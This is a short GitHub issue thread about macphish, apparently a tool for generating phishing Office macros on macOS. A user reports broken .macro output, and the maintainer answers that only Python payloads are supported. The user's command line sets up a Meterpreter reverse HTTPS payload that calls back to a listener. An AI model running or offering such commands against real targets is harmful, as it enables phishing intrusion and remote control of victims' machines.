### ISSUE TITLE
Macro file output broken

### ISSUE THREAD

**Issue by drale2k** [cldrn/macphish#1]
Hi,

after running `./macphish.py -lh 192.168.0.6 -lp 443 -p osx/x64/meterpreter_reverse_https -a meterpreter -m
`

the .macro files in generated but the output seems broken. I can not even copy it so i had to make a screenshot since it only copies a small part of it. 

I am running macphish on Kali Linux.
<img width="642" alt="bildschirmfoto 2017-10-10 um 14 20 03" src="https://user-images.githubusercontent.com/271416/31386306-987365e0-adc6-11e7-978b-425c6479d10f.png">

``

**Comment by drale2k** [comment]
bump

**Comment by cldrn** [comment]
Hey,

The tool only supports python payloads for now. Any of them would work.

Ps.Sorry for the late reply. I've been traveling abroad and my internet access has been limited.
